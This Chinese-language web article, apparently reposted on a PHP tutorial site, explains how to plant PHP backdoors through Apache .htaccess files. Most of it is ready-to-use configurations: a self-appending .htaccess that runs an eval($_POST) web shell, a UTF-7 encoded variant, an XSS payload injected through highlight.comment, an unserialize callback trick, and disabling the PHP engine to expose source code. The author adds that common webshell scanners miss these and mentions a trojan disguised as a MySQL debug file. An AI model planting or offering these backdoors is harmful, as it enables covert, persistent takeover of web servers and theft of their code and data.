当前位置:实例文章 » PHP实例» [文章]利用.htaccess文件构成的PHP后门

利用.htaccess文件构成的PHP后门

发布人:shili8 发布时间:2022-12-10 10:13 阅读次数:33

0x00 .htaccess简介

?

.htaccess 是Apache HTTP Server的文件目录系统级别的配置文件的默认的名字。它提供了在主配置文件中定义用户自定义指令的支持。 这些配置指令需要在 .htaccess 上下文 和用户需要的适当许可。

?

平时开发用的最多的就是URL重定向功能。

?

0x01 开启.htaccess

?

Apache中修改配置文件httpd.conf

?

1、修改如下内容

Options FollowSymLinks

AllowOverride None

?

为:

Options FollowSymLinks

AllowOverride All

?

2、开启rewrite模块

LoadModule rewrite_module modules/mod_rewrite.so

?

0x02 后门篇

?

1、 ? 文件包含

.htaccess:
php_value auto_append_file D:/wamp/www/1.txt
*.php

2、 ? XSS后门

.htaccess:
php_value highlight.comment '"><script>alert(1);</script>'
*.php

3、 ? PHP后门

.htaccess:
php_value auto_append_file .htaccess
#<?php eval($_POST[1]);
*.php
.htaccess:
php_flag zend.multibyte 1
php_value zend.script_encoding "UTF-7"
php_value auto_append_file .htaccess
#+ADw-script+AD4-alert(1)+ADsAPA-/script+AD4 #+ADw?php phpinfo()+Ads
*.php
.htaccess:
php_value unserialize_callback_func "phpinfo"
index.php:
unserialize('O:1:"1":0:{}');

?

?

类似的回调函数都是可以的,过此处phpinfo要怎么调用才能运行任意代码还没研究出来。

?

4、 ? 任意文件下载

.htaccess:
php_flag engine 0
*.php

?

?

0x03 webshell查杀

?

目前使用了D盾webshell查杀、SeayFindShell等工具对这个都没有查杀效果。不过也都是一些简单的一句话木马了,很容易被入库干掉。自己写了一个伪装成mysql调试文件的PHP木马,感觉好用多了。

相关标签:

免责声明

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱290110527@qq.com删除。

其他信息

其他资源

Top